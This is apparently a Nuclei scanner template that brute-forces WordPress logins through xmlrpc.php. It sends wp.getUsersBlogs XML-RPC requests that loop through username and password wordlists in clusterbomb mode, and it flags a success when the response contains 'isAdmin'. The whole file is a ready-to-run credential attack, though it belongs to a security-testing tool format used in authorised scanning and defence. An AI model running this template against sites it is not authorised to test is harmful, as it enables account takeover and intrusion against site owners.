id: wordpress-xmlrpc-brute-force

info:
  name: Wordpress XMLRPC.php username and password Bruteforcer
  author: Exid
  severity: high
  description: This template bruteforces username and passwords through xmlrpc.php being available.
  reference:
    - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c
    - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
  metadata:
    max-request: 276
  tags: wordpress,php,xmlrpc,fuzz

http:
  - raw:
      - |
        POST /xmlrpc.php HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 235

        <?xml version="1.0" encoding="UTF-8"?>
         <methodCall>
           <methodName>wp.getUsersBlogs</methodName>
           <params>
             <param>
               <value>{{username}}</value>
             </param>
               <param>
             <value>{{password}}</value>
               </param>
           </params>
         </methodCall>

    attack: clusterbomb
    payloads:
      username: helpers/wordlists/wp-users.txt
      password: helpers/wordlists/wp-passwords.txt

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - 'url'
          - 'xmlrpc'
          - 'isAdmin'
        condition: and
# digest: 4b0a00483046022100839dceeff1c99ab99987775bf0dd1b1e49484f04ee2dfcaad2efe50cc5e4664b0221008dd04e8a60479668c3a4376bf529be55ee6f0ebce8d2fdc2513ebd0201011fd9:922c64590222798bb761d5b6d8e72950